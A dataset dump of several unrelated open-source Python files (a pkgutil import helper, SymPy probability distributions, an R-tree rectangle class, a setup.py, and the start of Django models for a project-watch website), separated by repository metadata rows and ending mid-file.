entries from shadowing them.
For this to cause a visible difference in behaviour, there must
be a module or package name that is accessible via both sys.path
and one of the non PEP 302 file system mechanisms. In this case,
the emulation will find the former version, while the builtin
import mechanism will find the latter.
Items of the following types can be affected by this discrepancy:
imp.C_EXTENSION, imp.PY_SOURCE, imp.PY_COMPILED, imp.PKG_DIRECTORY
"""
if fullname.startswith('.'):
raise ImportError("Relative module names not supported")
if '.' in fullname:
# Get the containing package's __path__
pkg = '.'.join(fullname.split('.')[:-1])
if pkg not in sys.modules:
__import__(pkg)
path = getattr(sys.modules[pkg], '__path__', None) or []
else:
for importer in sys.meta_path:
yield importer
path = sys.path
for item in path:
yield get_importer(item)
if '.' not in fullname:
yield ImpImporter()
def get_loader(module_or_name):
"""Get a PEP 302 "loader" object for module_or_name
If the module or package is accessible via the normal import
mechanism, a wrapper around the relevant part of that machinery
is returned. Returns None if the module cannot be found or imported.
If the named module is not already imported, its containing package
(if any) is imported, in order to establish the package __path__.
This function uses iter_importers(), and is thus subject to the same
limitations regarding platform-specific special import locations such
as the Windows registry.
"""
if module_or_name in sys.modules:
module_or_name = sys.modules[module_or_name]
if isinstance(module_or_name, ModuleType):
module = module_or_name
loader = getattr(module, '__loader__', None)
if loader is not None:
return loader
fullname = module.__name__
elif module_or_name == sys:
# Jython sys is not a real module; fake it here for now since
# making it a module requires a fair amount of decoupling from
# PySystemState
fullname = "sys"
else:
fullname = module_or_name
return find_loader(fullname)
def find_loader(fullname):
"""Find a PEP 302 "loader" object for fullname
If fullname contains dots, path must be the containing package's __path__.
Returns None if the module cannot be found or imported. This function uses
iter_importers(), and is thus subject to the same limitations regarding
platform-specific special import locations such as the Windows registry.
"""
for importer in iter_importers(fullname):
loader = importer.find_module(fullname)
if loader is not None:
return loader
return None
def extend_path(path, name):
"""Extend a package's path.
Intended use is to place the following code in a package's __init__.py:
from pkgutil import extend_path
__path__ = extend_path(__path__, __name__)
This will add to the package's __path__ all subdirectories of
directories on sys.path named after the package. This is useful
if one wants to distribute different parts of a single logical
package as multiple directories.
It also looks for *.pkg files beginning where * matches the name
argument. This feature is similar to *.pth files (see site.py),
except that it doesn't special-case lines starting with 'import'.
A *.pkg file is trusted at face value: apart from checking for
duplicates, all entries found in a *.pkg file are added to the
path, regardless of whether they are exist the filesystem. (This
is a feature.)
If the input path is not a list (as is the case for frozen
packages) it is returned unchanged. The input path is not
modified; an extended copy is returned. Items are only appended
to the copy at the end.
It is assumed that sys.path is a sequence. Items of sys.path that
are not (unicode or 8-bit) strings referring to existing
directories are ignored. Unicode items of sys.path that cause
errors when used as filenames may cause this function to raise an
exception (in line with os.path.isdir() behavior).
"""
if not isinstance(path, list):
# This could happen e.g. when this is called from inside a
# frozen package. Return the path unchanged in that case.
return path
pname = os.path.join(*name.split('.')) # Reconstitute as relative path
# Just in case os.extsep != '.'
sname = os.extsep.join(name.split('.'))
sname_pkg = sname + os.extsep + "pkg"
init_py = "__init__" + os.extsep + "py"
path = path[:] # Start with a copy of the existing path
for dir in sys.path:
if not isinstance(dir, basestring) or not os.path.isdir(dir):
continue
subdir = os.path.join(dir, pname)
# XXX This may still add duplicate entries to path on
# case-insensitive filesystems
initfile = os.path.join(subdir, init_py)
if subdir not in path and os.path.isfile(initfile):
path.append(subdir)
# XXX Is this the right thing for subpackages like zope.app?
# It looks for a file named "zope.app.pkg"
pkgfile = os.path.join(dir, sname_pkg)
if os.path.isfile(pkgfile):
try:
f = open(pkgfile)
except IOError, msg:
sys.stderr.write("Can't open %s: %s\n" %
(pkgfile, msg))
else:
for line in f:
line = line.rstrip('\n')
if not line or line.startswith('#'):
continue
path.append(line) # Don't check for existence!
f.close()
return path
| apache-2.0 | 1,416,052,986,150,676,500 | 33.354015 | 84 | 0.597472 | false |
Cuuuurzel/KiPyCalc | sympy_old/statistics/distributions.py | 2 | 11156 | from sympy.core import sympify, Lambda, Dummy, Integer, Rational, oo, Float, pi
from sympy.functions import sqrt, exp, erf
from sympy.printing import sstr
import random
class Sample(tuple):
"""
Sample([x1, x2, x3, ...]) represents a collection of samples.
Sample parameters like mean, variance and stddev can be accessed as
properties.
The sample will be sorted.
"""
def __new__(cls, sample):
s = tuple.__new__(cls, sorted(sample))
s.mean = mean = sum(s) / Integer(len(s))
s.variance = sum([(x-mean)**2 for x in s]) / Integer(len(s))
s.stddev = sqrt(s.variance)
if len(s) % 2:
s.median = s[len(s)//2]
else:
s.median = sum(s[len(s)//2-1:len(s)//2+1]) / Integer(2)
return s
def __repr__(self):
return sstr(self)
def __str__(self):
return sstr(self)
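# Quick illustration (not an original doctest): samples are sorted on
# creation and expose mean/median/variance as exact SymPy numbers.
#
#     >>> s = Sample([3, 1, 2])
#     >>> s.mean, s.median, s.variance
#     (2, 2, 2/3)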
class ContinuousProbability(object):
"""Base class for continuous probability distributions"""
def probability(s, a, b):
"""Calculate the probability that a random number x generated
from the distribution satisfies a <= x <= b """
return s.cdf(b) - s.cdf(a)
def random(s, n=None):
"""
random() -- generate a random number from the distribution.
random(n) -- generate a Sample of n random numbers.
"""
if n is None:
return s._random()
else:
return Sample([s._random() for i in xrange(n)])
def __repr__(self):
return sstr(self)
def __str__(self):
return sstr(self)
class Normal(ContinuousProbability):
"""
Normal(mu, sigma) represents the normal or Gaussian distribution
with mean value mu and standard deviation sigma.
Example usage:
>>> from sympy.statistics import Normal
>>> from sympy import oo
>>> N = Normal(1, 2)
>>> N.mean
1
>>> N.variance
4
>>> N.probability(-oo, 1) # probability on an interval
1/2
>>> N.probability(1, oo)
1/2
>>> N.probability(-oo, oo)
1
>>> N.probability(-1, 3)
erf(sqrt(2)/2)
>>> _.evalf()
0.682689492137086
"""
def __init__(self, mu, sigma):
self.mu = sympify(mu)
self.sigma = sympify(sigma)
mean = property(lambda s: s.mu)
median = property(lambda s: s.mu)
mode = property(lambda s: s.mu)
stddev = property(lambda s: s.sigma)
variance = property(lambda s: s.sigma**2)
def pdf(s, x):
"""Return the probability density function as an expression in x"""
x = sympify(x)
return 1/(s.sigma*sqrt(2*pi)) * exp(-(x-s.mu)**2 / (2*s.sigma**2))
def cdf(s, x):
"""Return the cumulative density function as an expression in x"""
x = sympify(x)
return (1+erf((x-s.mu)/(s.sigma*sqrt(2))))/2
def _random(s):
return random.gauss(float(s.mu), float(s.sigma))
def confidence(s, p):
"""Return a symmetric (p*100)% confidence interval. For example,
p=0.95 gives a 95% confidence interval. Currently this function
only handles numerical values except in the trivial case p=1.
        Example usage:
# One standard deviation
>>> from sympy.statistics import Normal
>>> N = Normal(0, 1)
>>> N.confidence(0.68)
(-0.994457883209753, 0.994457883209753)
>>> N.probability(*_).evalf()
0.680000000000000
# Two standard deviations
>>> N = Normal(0, 1)
>>> N.confidence(0.95)
(-1.95996398454005, 1.95996398454005)
>>> N.probability(*_).evalf()
0.950000000000000
"""
if p == 1:
return (-oo, oo)
assert p <= 1
# In terms of n*sigma, we have n = sqrt(2)*ierf(p). The inverse
# error function is not yet implemented in SymPy but can easily be
# computed numerically
from sympy.mpmath import mpf, erfinv
# calculate y = ierf(p) by solving erf(y) - p = 0
y = erfinv(mpf(p))
t = Float(str(mpf(float(s.sigma)) * mpf(2)**0.5 * y))
mu = s.mu.evalf()
return (mu-t, mu+t)
@staticmethod
def fit(sample):
"""Create a normal distribution fit to the mean and standard
deviation of the given distribution or sample."""
if not hasattr(sample, "stddev"):
sample = Sample(sample)
return Normal(sample.mean, sample.stddev)
class Uniform(ContinuousProbability):
"""
Uniform(a, b) represents a probability distribution with uniform
probability density on the interval [a, b] and zero density
everywhere else.
"""
def __init__(self, a, b):
self.a = sympify(a)
self.b = sympify(b)
mean = property(lambda s: (s.a+s.b)/2)
median = property(lambda s: (s.a+s.b)/2)
mode = property(lambda s: (s.a+s.b)/2) # arbitrary
variance = property(lambda s: (s.b-s.a)**2 / 12)
stddev = property(lambda s: sqrt(s.variance))
def pdf(s, x):
"""Return the probability density function as an expression in x"""
x = sympify(x)
if not x.is_Number:
raise NotImplementedError("SymPy does not yet support"
"piecewise functions")
if x < s.a or x > s.b:
return Rational(0)
return 1/(s.b-s.a)
def cdf(s, x):
"""Return the cumulative density function as an expression in x"""
x = sympify(x)
if not x.is_Number:
raise NotImplementedError("SymPy does not yet support"
"piecewise functions")
if x <= s.a:
return Rational(0)
if x >= s.b:
return Rational(1)
return (x-s.a)/(s.b-s.a)
def _random(s):
return Float(random.uniform(float(s.a), float(s.b)))
def confidence(s, p):
"""Generate a symmetric (p*100)% confidence interval.
>>> from sympy import Rational
>>> from sympy.statistics import Uniform
>>> U = Uniform(1, 2)
>>> U.confidence(1)
(1, 2)
>>> U.confidence(Rational(1,2))
(5/4, 7/4)
"""
p = sympify(p)
assert p <= 1
d = (s.b-s.a)*p / 2
return (s.mean - d, s.mean + d)
@staticmethod
def fit(sample):
"""Create a uniform distribution fit to the mean and standard
deviation of the given distribution or sample."""
if not hasattr(sample, "stddev"):
sample = Sample(sample)
m = sample.mean
d = sqrt(12*sample.variance)/2
return Uniform(m-d, m+d)
class PDF(ContinuousProbability):
"""
PDF(func, (x, a, b)) represents continuous probability distribution
with probability distribution function func(x) on interval (a, b)
If func is not normalized so that integrate(func, (x, a, b)) == 1,
it can be normalized using PDF.normalize() method
Example usage:
>>> from sympy import Symbol, exp, oo
>>> from sympy.statistics.distributions import PDF
>>> from sympy.abc import x
>>> a = Symbol('a', positive=True)
>>> exponential = PDF(exp(-x/a)/a, (x,0,oo))
>>> exponential.pdf(x)
exp(-x/a)/a
>>> exponential.cdf(x)
1 - exp(-x/a)
>>> exponential.mean
a
>>> exponential.variance
a**2
"""
def __init__(self, pdf, var):
#XXX maybe add some checking of parameters
if isinstance(var, (tuple, list)):
self.pdf = Lambda(var[0], pdf)
self.domain = tuple(var[1:])
else:
self.pdf = Lambda(var, pdf)
self.domain = (-oo, oo)
self._cdf = None
self._mean = None
self._variance = None
self._stddev = None
def normalize(self):
"""
Normalize the probability distribution function so that
integrate(self.pdf(x), (x, a, b)) == 1
Example usage:
>>> from sympy import Symbol, exp, oo
>>> from sympy.statistics.distributions import PDF
>>> from sympy.abc import x
>>> a = Symbol('a', positive=True)
>>> exponential = PDF(exp(-x/a), (x,0,oo))
>>> exponential.normalize().pdf(x)
exp(-x/a)/a
"""
norm = self.probability(*self.domain)
if norm != 1:
w = Dummy('w', real=True)
return self.__class__(self.pdf(w)/norm, (w, self.domain[0], self.domain[1]))
#self._cdf = Lambda(w, (self.cdf(w) - self.cdf(self.domain[0]))/norm)
#if self._mean is not None:
# self._mean /= norm
#if self._variance is not None:
# self._variance = (self._variance + (self._mean*norm)**2)/norm - self.mean**2
#if self._stddev is not None:
# self._stddev = sqrt(self._variance)
else:
return self
def cdf(self, x):
x = sympify(x)
if self._cdf is not None:
return self._cdf(x)
else:
from sympy import integrate
w = Dummy('w', real=True)
self._cdf = integrate(self.pdf(w), w)
self._cdf = Lambda(w, self._cdf - self._cdf.subs(w, self.domain[0]))
return self._cdf(x)
def _get_mean(self):
if self._mean is not None:
return self._mean
else:
from sympy import integrate
w = Dummy('w', real=True)
self._mean = integrate(self.pdf(w)*w,(w,self.domain[0],self.domain[1]))
return self._mean
def _get_variance(self):
if self._variance is not None:
return self._variance
else:
from sympy import integrate, simplify
w = Dummy('w', real=True)
self._variance = integrate(self.pdf(w)*w**2,(w,self.domain[0],self.domain[1])) - self.mean**2
self._variance = simplify(self._variance)
return self._variance
def _get_stddev(self):
if self._stddev is not None:
return self._stddev
else:
self._stddev = sqrt(self.variance)
return self._stddev
mean = property(_get_mean)
variance = property(_get_variance)
stddev = property(_get_stddev)
def _random(s):
raise NotImplementedError
def transform(self,func,var):
"""Return a probability distribution of random variable func(x)
currently only some simple injective functions are supported"""
w = Dummy('w', real=True)
from sympy import solve
inverse = solve(func-w, var)
        newPdf = sympify(0)  # S is not imported in this module, so build zero via sympify
funcdiff = func.diff(var)
#TODO check if x is in domain
for x in inverse:
# this assignment holds only for x in domain
# in general it would require implementing
# piecewise defined functions in sympy
newPdf += (self.pdf(var)/abs(funcdiff)).subs(var,x)
return PDF(newPdf, (w, func.subs(var, self.domain[0]), func.subs(var, self.domain[1])))
| mit | -1,953,693,750,331,349,500 | 29.903047 | 105 | 0.547598 | false |
DigitalSlideArchive/HistomicsTK | histomicstk/annotations_and_masks/pyrtree/rect.py | 1 | 5357 | """
# Modified from: https://code.google.com/archive/p/pyrtree/ .
# Copyright Google
# Under The 3-Clause BSD License
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION). HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
import math
class Rect:
"""
    A rectangle class that stores an axis-aligned rectangle and two flags
    (swapped_x and swapped_y). (The flags are stored implicitly via swaps
    in the order of minx/y and maxx/y.)
"""
__slots__ = ("x", "y", "xx", "yy", "swapped_x", "swapped_y")
def __init__(self, minx, miny, maxx, maxy):
"""Placeholder."""
self.swapped_x = (maxx < minx)
self.swapped_y = (maxy < miny)
self.x = minx
self.y = miny
self.xx = maxx
self.yy = maxy
if self.swapped_x:
self.x, self.xx = maxx, minx
if self.swapped_y:
self.y, self.yy = maxy, miny
def coords(self):
"""Placeholder."""
return self.x, self.y, self.xx, self.yy
def overlap(self, orect):
"""Placeholder."""
return self.intersect(orect).area()
def write_raw_coords(self, toarray, idx):
"""Placeholder."""
toarray[idx] = self.x
toarray[idx+1] = self.y
toarray[idx+2] = self.xx
toarray[idx+3] = self.yy
if (self.swapped_x):
toarray[idx] = self.xx
toarray[idx+2] = self.x
if (self.swapped_y):
toarray[idx + 1] = self.yy
toarray[idx + 3] = self.y
def area(self):
"""Placeholder."""
w = self.xx - self.x
h = self.yy - self.y
return w * h
def extent(self):
"""Placeholder."""
x = self.x
y = self.y
return (x, y, self.xx-x, self.yy-y)
def grow(self, amt):
"""Placeholder."""
a = amt * 0.5
return Rect(self.x-a, self.y-a, self.xx+a, self.yy+a)
def intersect(self, o):
"""Placeholder."""
if self is NullRect:
return NullRect
if o is NullRect:
return NullRect
nx, ny = max(self.x, o.x), max(self.y, o.y)
nx2, ny2 = min(self.xx, o.xx), min(self.yy, o.yy)
w, h = nx2 - nx, ny2 - ny
if w <= 0 or h <= 0:
return NullRect
return Rect(nx, ny, nx2, ny2)
def does_contain(self, o):
"""Placeholder."""
return self.does_containpoint((o.x, o.y)) and self.does_containpoint(
(o.xx, o.yy))
def does_intersect(self, o):
"""Placeholder."""
return (self.intersect(o).area() > 0)
def does_containpoint(self, p):
"""Placeholder."""
x, y = p
return (x >= self.x and x <= self.xx and y >= self.y and y <= self.yy)
def union(self, o):
"""Placeholder."""
if o is NullRect:
return Rect(self.x, self.y, self.xx, self.yy)
if self is NullRect:
return Rect(o.x, o.y, o.xx, o.yy)
x = self.x
y = self.y
xx = self.xx
yy = self.yy
ox = o.x
oy = o.y
oxx = o.xx
oyy = o.yy
nx = x if x < ox else ox
ny = y if y < oy else oy
nx2 = xx if xx > oxx else oxx
ny2 = yy if yy > oyy else oyy
res = Rect(nx, ny, nx2, ny2)
return res
def union_point(self, o):
"""Placeholder."""
x, y = o
return self.union(Rect(x, y, x, y))
def diagonal_sq(self):
"""Placeholder."""
if self is NullRect:
return 0
w = self.xx - self.x
h = self.yy - self.y
return w * w + h * h
def diagonal(self):
"""Placeholder."""
return math.sqrt(self.diagonal_sq())
NullRect = Rect(0.0, 0.0, 0.0, 0.0)
NullRect.swapped_x = False
NullRect.swapped_y = False
def union_all(kids):
"""Placeholder."""
cur = NullRect
for k in kids:
cur = cur.union(k.rect)
assert(not cur.swapped_x)
return cur
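# Small sanity example (added for illustration): intersection and union of two
# overlapping axis-aligned rectangles.
#
#     r1 = Rect(0.0, 0.0, 2.0, 2.0)
#     r2 = Rect(1.0, 1.0, 3.0, 3.0)
#     r1.intersect(r2).coords()   # -> (1.0, 1.0, 2.0, 2.0), area 1.0
#     r1.union(r2).coords()       # -> (0.0, 0.0, 3.0, 3.0)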
| apache-2.0 | -7,042,509,289,810,102,000 | 28.11413 | 79 | 0.582416 | false |
watsonpy/watson-filesystem | setup.py | 1 | 1839 | # -*- coding: utf-8 -*-
import os
from setuptools import setup, find_packages
import watson.filesystem
name = 'watson-filesystem'
description = 'Abstracted filesystems for Watson.'
version = watson.filesystem.__version__
def read(filename, as_list=False):
with open(os.path.join(os.path.dirname(__file__), filename)) as f:
contents = f.read()
if as_list:
return contents.splitlines()
return contents
setup(
name=name,
version=version,
url='http://github.com/watsonpy/' + name,
description=description,
long_description=read('README.md'),
long_description_content_type='text/markdown',
author='Simon Coulton',
author_email='[email protected]',
license='BSD',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Internet :: WWW/HTTP :: WSGI',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules',
],
packages=find_packages(
exclude=["*.tests", "*.tests.*", "tests.*", "tests"]),
include_package_data=True,
zip_safe=False,
install_requires=read('requirements.txt', as_list=True),
extras_require={
'test': read('requirements-test.txt', as_list=True)
},
)
| bsd-3-clause | 1,461,598,912,690,142,700 | 31.839286 | 79 | 0.617183 | false |
holgerd77/django-public-project | public_project/models.py | 1 | 42740 | # coding=UTF-8
import os
import shutil
import subprocess
from datetime import datetime
from itertools import chain
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
from django.contrib.sites.models import Site
from django.db import models
from django.db.models.signals import post_save, pre_delete
from django.dispatch import receiver
from django.utils.text import slugify
from django.utils.translation import ugettext, ugettext_lazy as _
from django.utils.http import urlquote
from public_project.doc_scanner import DocScanner
class UserProfile(models.Model):
user = models.OneToOneField(User)
receive_new_comment_emails = models.BooleanField(default=True)
def create_user_profile(sender, instance, created, **kwargs):
if created:
UserProfile.objects.create(user=instance)
post_save.connect(create_user_profile, sender=User)
class Image(models.Model):
title = models.CharField(_("Title"), max_length=250)
help_text = _("400px max width, 200px for images used with floating texts")
image = models.ImageField(_("Image"), upload_to='images', help_text=help_text)
help_text = _("Attribution to the original image source or alternatively something like 'Own image'.")
attribution = models.CharField(_("Attribution"), max_length=250, help_text=help_text)
help_text = _("Link to the original image source (if available)")
attribution_url = models.URLField(_("Attribution URL"), help_text=help_text, blank=True, null=True)
comments = models.TextField(_("Comments (internal)"), blank=True)
def __unicode__(self):
return self.title
class Meta:
ordering = ['title',]
verbose_name = _('Image')
verbose_name_plural = _('Images')
class SiteConfigManager(models.Manager):
def get_site_config(self, request):
if super(SiteConfigManager, self).count() == 0:
site_config = SiteConfig()
site_config.save()
else:
site_config = super(SiteConfigManager, self).all()[0]
site_config.pdf_viewer = 'STANDARD'
site_config.browser = 'Unknown'
if request and 'HTTP_USER_AGENT' in request.META:
if 'Mozilla'.lower() in request.META['HTTP_USER_AGENT'].lower():
site_config.pdf_viewer = 'STANDARD'
site_config.browser = 'Mozilla'
if 'Safari'.lower() in request.META['HTTP_USER_AGENT'].lower():
site_config.pdf_viewer = 'STANDARD'
site_config.browser = 'Safari'
if 'Chrome'.lower() in request.META['HTTP_USER_AGENT'].lower():
site_config.pdf_viewer = 'STANDARD'
site_config.browser = 'Chrome'
if 'Opera'.lower() in request.META['HTTP_USER_AGENT'].lower():
site_config.pdf_viewer = 'STANDARD'
site_config.browser = 'Opera'
if 'MSIE'.lower() in request.META['HTTP_USER_AGENT'].lower():
if getattr(settings, 'DPP_IE_COMPATIBLE_PDF_VIEWER', False):
site_config.pdf_viewer = 'LEGACY'
else:
site_config.pdf_viewer = False
site_config.browser = 'MSIE'
if getattr(settings, 'DPP_PUBLIC_API', False):
site_config.public_api = True
else:
site_config.public_api = False
if getattr(settings, 'DPP_CUSTOM_JS', False):
site_config.custom_js = settings.DPP_CUSTOM_JS
else:
site_config.custom_js = ''
if getattr(settings, 'DPP_CUSTOM_CSS', False):
site_config.custom_css = settings.DPP_CUSTOM_CSS
else:
site_config.custom_css = ''
return site_config
class SiteConfig(models.Model):
help_text = _("Main title, shown in the header navi.")
default = _("Project Website Title")
title = models.CharField(_("Title"), max_length=250, help_text=help_text, default=default)
help_text = _("Short version of the title, used e.g. in emails.")
default = _("Project Website Short Title")
short_title = models.CharField(_("Short title"), max_length=250, help_text=help_text, default=default)
help_text = _("Color for the page title (Format: '#990000').")
title_color = models.CharField(_("Title color"), max_length=7, help_text=help_text, default='#990000')
help_text = _("Show/use the Goals category in the project.")
show_goals_category = models.BooleanField(default=True)
help_text = _("Show/use the Questions category in the project.")
show_questions_category = models.BooleanField(default=True)
help_text = _("Activate user comments.")
activate_comments = models.BooleanField(default=True)
help_text = _("Short intro text to describe your page (HTML possible), not too long, use about text for detailed information.")
default = _("This is a project watch website.")
intro_text = models.TextField(_("Intro text"), help_text=help_text, default=default)
help_text = _("Short intro text about this site, what is the purpose, who is running it.")
default = _("About text")
about_text = models.TextField(_("About text"), help_text=help_text, default=default)
help_text = _("Some html text you want to use in the footer of the page, you can e.g. \
provide a link to your email adress or associated social media sites.")
footer = models.TextField(_("Footer"), help_text=help_text, default=_("Footer HTML Default"))
help_text = _("Html to be displayed on the contact page, provide at least an adress there \
and some contact information.")
contact_text = models.TextField(_("Contact"), help_text=help_text, default=_("Contact HTML Default"))
comments = models.TextField(_("Comments (internal)"), blank=True)
objects = SiteConfigManager()
def __unicode__(self):
return self.title
class Meta:
verbose_name = _('Website Configuration')
verbose_name_plural = _('Website Configuration')
class SiteCategory(models.Model):
NAME_CHOICES = (
('home', "Home"),
('project_parts', _('Topics')),
('goals', _('Goals')),
('questions', _('Questions')),
('participants', _('Participants')),
('events', _('Events')),
('documents', _('Documents')),
)
category = models.CharField(_("Category"), max_length=50, choices=NAME_CHOICES, unique=True)
intro_text = models.TextField(_("Intro text"), blank=True, null=True)
documents = models.ManyToManyField('Document', related_name="related_site_categories", blank=True, verbose_name=_("Documents"))
web_sources = GenericRelation('WebSource', verbose_name=_("Web Sources"))
comments = models.TextField(_("Comments (internal)"), blank=True)
date_added = models.DateTimeField(auto_now_add=True)
def __unicode__(self):
return self.get_category_display()
class Meta:
verbose_name = _('Website Category')
verbose_name_plural = _('Website Categories')
class ParticipantType(models.Model):
help_text = _("Type or category for sorting of participants")
name = models.CharField(_("Title"), max_length=250, help_text=help_text)
help_text = _("Use integer numbers for ordering (e.g. '100', '200', '300').")
order = models.IntegerField(_("Order"), default=100)
date_added = models.DateTimeField(auto_now_add=True)
def get_participants(self):
return self.participant_set.filter(belongs_to=None)
def __unicode__(self):
return self.name
class Meta:
ordering = ['order']
verbose_name = _('Type Participants')
verbose_name_plural = _('Types Participants')
class WebSource(models.Model):
title = models.CharField(_("Title"), max_length=250)
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey("content_type", "object_id")
help_text = _("Use integer numbers for ordering (e.g. '100', '200', '300').")
order = models.IntegerField(_("Order"), help_text=help_text, default=100, blank=True, null=True)
url = models.URLField(_("URL"))
date = models.DateField(_("Date"), blank=True, null=True)
date_added = models.DateTimeField(auto_now_add=True)
def __unicode__(self):
return self.title
def get_absolute_url(self):
return "/" + ugettext("web_sources_url") + unicode(self.id) + "/"
@classmethod
def get_icon_class(cls):
return 'icon-globe'
class Meta:
ordering = ['order']
verbose_name = _('Web-Source')
verbose_name_plural = _('Web-Sources')
class Membership(models.Model):
from_participant = models.ForeignKey('Participant', related_name='from_memberships', verbose_name=_("From participant"))
help_text = _('Association with a group or institution')
to_participant = models.ForeignKey('Participant', help_text=help_text, related_name='to_memberships', verbose_name=_("To participant"))
help_text = _("Type or function of the membership or task or position of the participant.")
function = models.CharField(_("Function"), max_length=50, help_text=help_text, blank=True, null=True)
active = models.BooleanField(_("Active"), default=True)
class Meta:
verbose_name = _('Membership')
verbose_name_plural = _('Memberships')
class Participant(models.Model):
help_text = _("Person, group or institution acting in some way in the context of the project or being affected by the process or the result of the project execution.")
name = models.CharField(_("Name"), max_length=250, help_text=help_text, unique=True)
help_text = _("Type for sorting, only for groups/institutions, necessary for participant to be visible on site")
type = models.ForeignKey(ParticipantType, blank=True, null=True, help_text=help_text)
help_text = _("Use integer numbers for ordering (e.g. '100', '200', '300').")
order = models.IntegerField(_("Order"), help_text=help_text, default=500, blank=True, null=True)
help_text = _("The participant belongs to another participant (often an institution or group), leave blank if participant itself is institution/group.")
belongs_to = models.ManyToManyField('self', symmetrical=False, through='Membership', verbose_name=_("Belongs to"))
search_tags = GenericRelation('SearchTag')
help_text = _("Role/tasks as well as interests/goals of the participant regarding the project.")
description = models.TextField(_("Description"), help_text=help_text)
web_sources = GenericRelation(WebSource)
comment_relations = GenericRelation('CommentRelation')
comments = models.TextField(_("Comments (internal)"), blank=True)
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def __unicode__(self):
return self.name
def get_questions(self):
return Question.objects.filter(participants__in=list(chain([self,], self.participant_set.all()))).distinct()
def get_events(self):
return Event.objects.filter(participants__in=list(chain([self,], self.participant_set.all()))).distinct()
def get_documents(self):
return Document.objects.filter(participants__in=list(chain([self,], self.participant_set.all()))).distinct()
def get_feed_description(self):
html = self.description
return html
def get_absolute_url(self):
return "/" + ugettext("participants_url") + slugify(self.name) + '-' + unicode(self.id) + "/"
def get_comments_url(self):
return "/" + ugettext("participants_url") + unicode(self.id) + "/" + ugettext("comments_url")
def get_active_user_comments(self):
return self.comment_relations.filter(comment__published=True)
def get_num_active_user_comments(self):
return self.comment_relations.filter(comment__published=True).count()
@classmethod
def get_color(cls):
return '#3e3ec7';
def get_icon_class(self):
if self.belongs_to.count() > 0:
return 'icon-user'
else:
return 'icon-group'
def get_simple_entry(self):
html = '<i class="' + self.get_icon_class() + '"></i> '
html += '<a href="' + self.get_absolute_url() +'">' + self.name + '</a>'
return html
class Meta:
ordering = ['type', 'order', 'name',]
verbose_name = _('Participant')
verbose_name_plural = _('Participants')
class ProjectPart(models.Model):
help_text = _("Name of the topic")
name = models.CharField(_("Name"), max_length=250, help_text=help_text)
help_text = _("Use integer numbers for ordering (e.g. '100', '200', '300').")
order = models.IntegerField(_("Order"), help_text=help_text, default=500, blank=True, null=True)
help_text = _("If you select another project part here, you'll make this a sub project part.")
main_project_parts = models.ManyToManyField('self', symmetrical=False, help_text=help_text, blank=True, verbose_name=_("Main Topic"))
search_tags = GenericRelation('SearchTag')
help_text = _("Website (if existant).")
description = models.TextField(_("Description"), help_text=help_text)
web_sources = GenericRelation(WebSource)
comment_relations = GenericRelation('CommentRelation')
comments = models.TextField(_("Comments (internal)"), blank=True)
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def __unicode__(self):
return self.name
def get_questions(self):
return Question.objects.filter(project_parts__in=list(chain([self,], self.projectpart_set.all()))).distinct()
def get_num_questions(self):
return Question.objects.filter(project_parts__in=list(chain([self,], self.projectpart_set.all()))).distinct().count()
def get_events(self):
return Event.objects.filter(project_parts__in=list(chain([self,], self.projectpart_set.all()))).distinct()
def get_num_events(self):
return Event.objects.filter(project_parts__in=list(chain([self,], self.projectpart_set.all()))).distinct().count()
def get_documents(self):
return Document.objects.filter(project_parts__in=list(chain([self,], self.projectpart_set.all()))).distinct()
def get_num_documents(self):
return Document.objects.filter(project_parts__in=list(chain([self,], self.projectpart_set.all()))).distinct().count()
def get_feed_description(self):
html = self.description
return html
def get_absolute_url(self):
return "/" + ugettext("project_parts_url") + slugify(self.name) + '-' + unicode(self.id) + "/"
@classmethod
def get_color(cls):
return '#0d9434';
def get_icon_class(self):
if self.main_project_parts.count() > 0:
return 'icon-cog'
else:
return 'icon-cogs'
def get_simple_entry(self):
html = '<i class="' + self.get_icon_class() + '"></i> '
html += '<a href="' + self.get_absolute_url() +'">' + self.name + '</a>'
return html
class Meta:
ordering = ['order', 'name',]
verbose_name = _('Project Part')
verbose_name_plural = _('Project Parts')
class Event(models.Model):
EVENT_TYPE_CHOICES = (
('ME', _('Meeting / Gathering / Session')),
('IN', _('New Information / Decision / Statement')),
